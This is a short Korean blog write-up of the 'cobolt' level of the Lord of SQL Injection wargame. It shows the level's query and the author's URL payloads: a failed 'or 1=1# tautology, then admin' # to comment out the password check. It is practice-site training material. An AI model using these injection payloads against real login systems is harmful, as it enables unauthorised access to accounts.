LOS cobolt writeup
우선 문제를 보면 get방식으로 되어있고, pw에 md5 암호가 걸려있는 것을 확인할 수 있다.
http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin&pw=1234
.위와 같이
query : select id from prob_cobolt where id='admin' and pw=md5('1234')
이렇게 나오고 1번문제 푼것과 같이 넣어보면,
http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=%27or%201=1%23&pw=
이렇게 나온다...음... 이 방법은 아닌가보다.
if($result['id'] == 'admin') solve("cobolt");
elseif($result['id']) echo "<h2>Hello {$result['id']}<br>You are not admin :(</h2>";highlight_file(__FILE__);
전과 같은 방법을 쓰니 admin이 아니라 id가 rubiya님이 뜨는것을 확인할 수 있다. 흠 그럼 admin으로 로그인을 해야 된다는건데...
그래서 admin을 넣고 뒤에는 주석처리를 해주었다.
http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin%27%20%23
이렇게 하니 성공!!
'WebHacking > Lord of SQL injection Write-Up' 카테고리의 다른 글
LOS goblin writeup (0) | 2018.07.20 |
---|---|
Los gremlin writeup (0) | 2018.07.20 |